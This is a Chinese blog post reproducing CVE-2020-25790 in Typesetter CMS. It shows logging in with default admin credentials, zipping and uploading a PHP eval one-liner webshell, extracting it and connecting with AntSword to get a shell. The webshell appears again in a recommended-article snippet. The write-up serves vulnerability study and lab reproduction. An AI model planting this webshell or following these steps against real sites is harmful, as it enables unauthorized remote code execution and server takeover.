typesetter 文件上传(CVE-2020-25790)

最新推荐文章于 2024-04-18 16:47:36 发布
最新推荐文章于 2024-04-18 16:47:36 发布
阅读量656 收藏
点赞数 1
分类专栏: 漏洞 文章标签: typesetter 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/122236773
版权

typesetter 文件上传(CVE-2020-25790)

漏洞简介:

 Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 

环境搭建:

在线环境 地址

漏洞复现:

访问首页

点击logged in 进入登录界面 

账号密码: admin admin

创建一句话文件,压缩成压缩包

<?php @eval($_POST['cmd']);?>

将shell.zip进行上传 

 解压shell.zip压缩包

 

得到shell.php

 点击shell.php发现可以访问

 进行蚁剑连接

 成功进入后台,获得shell

 

 漏洞修复:

根据官方进行升级,打补丁

xzhome
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CKEditor-Glyphicons:将CKEditor Glyphicons插件添加到Typesetter CMS
02-04
将(版本2.2)添加到Typesetter的CKEditor(当前版本4.5)中。 另请参见, 安装后,一个新图标将出现在CKEditor的工具栏中,该图标将调用插件对话框,并允许将“ Glypicon Halflings”图标添加到可编辑的文本内容...
vue组件传值
weixin_44949635的博客
05-27 62
父传子靠属性,子传父靠事件 父传子: <body> <div id="app"> <!-- 此处父组件向子组件传递name值 注意:动态值要加bind 也就是:--> <navbar name="首页" :show="true"></navbar> <navbar name="侧边栏" :show="false"></navbar&gt...
Linux Declare 和TypeSet的具体用法
xyz的专栏
06-15 376
用途说明 declare命令是bash的一个内建命令,它可以用来声明shell变量,设置变量的属性(Declare variables and/or give them attributes)。该命令也可以写作typeset。虽然人们很少使用这个命令,如果知道了它的一些用法,就会发现这个命令还是挺有用的。 常用参数 格式:declare 格式:typeset 格式:declare -p 格式:typeset -p 显示所有变量的值。 格式:declare -p var 格式:t..
Linux typeset用法
learning_oracle的博客
06-24 5406
变量定义 在bash中,如果定义:A=3 此时A既可以当做字符串使用也可以当做数字使用 在ksh中,如果定义:A=3 则A只能当做变字符串使用 一种比较通用的方法就是使用typesettypeset –I A=0 此外在ksh中typeset还用很多参数可用: 1:typeset 将显示所有变量 2:typeset的-u选项可以将一个变量的字符变成大写 /home/lee
【漏洞复现-TypesetterCms-文件上传ZIP】vulfocus/typesetter-cve_2020_25790
10-10 906
【压缩后门文件上传
CVE-2020-25790typesetter 文件上传
beirry的博客
11-24 1233
vulfocus-typesetter 文件上传CVE-2020-25790) 从web端进入CMS,点击已上传的档案页面 准备test.php文件,文件内容如下 <?php @eval($_POST['cmd']);?>//一句话木马,$_POST的值是webshell密码 将test.php上传到该页面,出现报错,报错内容是permission denied. 将test.php压缩成zip文件,再次上传 上传成功,解压test.zip文件 test.php文件解压成功 获取t
Typesetter CMS 文件上传漏洞复现(CVE-2020-25790)
锋刃科技的博客
12-19 1765
0X00简介 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 0X01影响范围 Typesetter CMS 5.x全版本,目前GitHub项目中还未修复此漏洞 0X02漏洞复现 虽然对上传的文件进行了过滤,但是没有对解压文件的文件进行过滤,导致可以上传,php的压缩文件,解压后就可以执行php文件。 Finder.class.php文件中extract函数解压后未对,解压后的文件名进行任何过滤 登录管理员账号
tomcat漏洞之任意文件上传CVE-2017-12615)
weixin_53711701的博客
12-24 2776
tomcat漏洞之任意文件上传CVE-2017-12615)
typesetter 文件上传CVE-2020-25790)漏洞复现
weixin_42675091的博客
09-03 254
typesetter 文件上传CVE-2020-25790)漏洞复现
TouchSwipeLoader:一个用于Typesetter CMS的简单jQuery TouchSwipe加载程序插件
04-28
用于Typesetter CMS的TouchSwipe Loader插件 只需加载要在JavaScript中使用的(当前为1.6版)即可。 就这样。 也可以看看 当前版本 1.6 要求 排字机CMS 手动安装 下载 将提取的文件夹“ TouchSwipeLoader-master”...
Typesetter CMS v5.1.zip
07-06
Typesetter CMS简介 TypesetterCMS是一个功能全面的网站内容管理系统,其嵌入式的管理接口可以让用户在一个简单的浏览器窗口中看到网站的改变。 Typesetter CMS特色功能: 真正的所见即所得编辑器 (CKEditor) 图库浏览 (ColorBox) SEO 友好的链接 文件上传管理器 可编辑的风格内容 删除文件到回收站 多用户管理 文本存储 快速页面加载 快速简易安装 HTML Tidy (可选) 方便的数据备份导出功能 Typesetter CMS页面展示 相关阅读 同类推荐:CMS
Typesetter CMS v5.1
10-22
Typesetter cms是一个完整的内容管理系统,它可以用来创建丰富和可扩展性的站点,它的用户界面简单易用,内嵌的管理页面可以让用户在同一个窗口里即时的浏览站点页面的变更。
Typesetter CMS 5.1.zip
05-25
Typesetter CMS是一个功能全面的网站内容管理系统,其嵌入式的管理接口可以让用户在一个简单的浏览器窗口中看到网站的改变。 Typesetter CMS 5.1 更新日志:2017-08-12 页面编辑;部分可视性;剖面剪贴板;嵌入额外的内容;新的图库样式和缩略图选项;新主题“CajónScss”;管理UI改进。
Label Typesetter-开源
07-17
这是标签排字机项目。 该项目的目标是为任务争取最小的代码大小,这样我们就不再需要大块硬件来打印带有适当条码的美国和英国邮寄标签。
排版助手gidot typesetter 3.1.1
07-23
排版助手gidot typesetter 是一款比较受欢迎的智能文章排版软件,这款排版软件不大,且不需要安装即可轻松实现编辑排版。 排版助手gidot typesetter主要功能:段落智能修正、去掉某些防拷贝的干扰符、修正段落首尾...
如何保障企业核心应用系统的安全
最新发布
dexun123的博客
04-18 507
代码审计是一种专业的安全服务,旨在深入检查应用系统的源代码,以发现和修复潜在的安全漏洞和规范性缺陷。德迅云安全提供的这项服务,正是为了帮助企业在开发过程中加强应用的安全性,防止潜在的安全风险。在代码审计过程中,安全专家会对应用系统的所有逻辑路径进行全面测试。这包括分析代码结构、数据流、控制流等,以发现可能存在的安全缺陷。通过这种深入的分析,代码审计能够挖掘出普通安全测试可能无法发现的复杂安全问题,如二次注入、反序列化、xml实体注入等安全漏洞。
数字时代安全风险防范与保密科技创新
qq_41432686的博客
04-18 914
当前,随着科技的迅猛发展和经济社会数字化转型的加速演进,以人工智能、大数据、云计算、区块链、量子计算等为代表的新技术不断应用于社会生活各领域,给保密工作带来了新的发展机遇,也带来了较大挑战。一些国家加强新技术在保密领域的应用,不断提升保密水平和维护国家安全能力,同时加快出台监管政策,规范新技术领域发展,并积极探索安全保密与技术发展的平衡,确保信息安全。用好新技术这把“双刃剑”,既便利信息资源的传播利用,又能有效防范潜在的安全风险,是新时代保密工作亟待解决的新课题。
如何保护IP地址?安全匿名上网的方法
EVA_Proxy的博客
04-11 1304
IP地址是互联网协议地址的简称,它是一个独特的数字组合,专门用来识别和定位路由器、计算机或其他设备,确保它们能够顺畅地通过互联网进行通信。正如电子邮件地址能让别人给您发送邮件一样,远程计算机也需要您的IP地址来与您的计算机建立联系并进行交流。通常,IP地址的格式是由四个数字块组成的一个序列。每个数字块的取值范围都在0到255之间,这意味着每个数字块有256种可能的组合。这样的数字IP系统可以生成大约40亿个不同的IP地址。实际上,要追踪到某个人的IP地址并不是特别困难。
如何搭建高效安全的eBay测评环境:步骤与要点解析
weixin_61644212的博客
04-18 328
同时,要确保在整个过程中遵守相关法律法规和平台规定,确保测评的安全性和可持续性。使用防关联的浏览器,确保每个账号在浏览器层面上独立运行,防止关联。:确保每个账号都有独立的IP地址和支付工具,避免使用重复资源。:在处理个人信息和交易数据时,确保数据的安全性和隐私保护。:准备足够数量的纯净国外家庭住宅IP,确保每个账号都有独立的IP地址,避免IP重复率过高。:使用国外的服务器和纯净的国外家庭住宅IP,通过远程安全终端进行搭建,阻断硬件参数的关联。:信用卡或礼品卡等支付工具,确保支付流程的顺畅和安全
lombok-plugin-0.31-2020.1
01-26
lombok-plugin-0.31-2020.1是一款针对Java开发的插件,它可以在IDEA等集成开发环境中使用。lombok是一款流行的Java库,它可以通过简化代码来提高开发效率。lombok-plugin-0.31-2020.1则是为了更好地集成lombok库而开发的插件,它可以实现自动插入lombok注解,帮助开发者快速地生成getter、setter和构造函数等常用方法,从而减少冗长的代码编写过程。 此外,lombok-plugin-0.31-2020.1还支持自动代码清理和格式化功能,可以帮助开发者保持代码风格的一致性,提高代码质量。它还提供了一些便捷的快捷键和工具,使得开发过程更加高效便捷。 对于Java开发者而言,lombok-plugin-0.31-2020.1可以大大简化他们的开发过程,减少样板式代码的书写,提高代码的可读性和可维护性。它的功能和易用性使得它成为了广大Java开发者的首选插件之一。 总之,lombok-plugin-0.31-2020.1是一款功能强大、易用的Java开发插件,它通过简化代码和提高开发效率,为开发者带来了极大的便利。希望开发者能够善用这一工具,提高自己的开发效率,更快地构建出高质量的Java应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值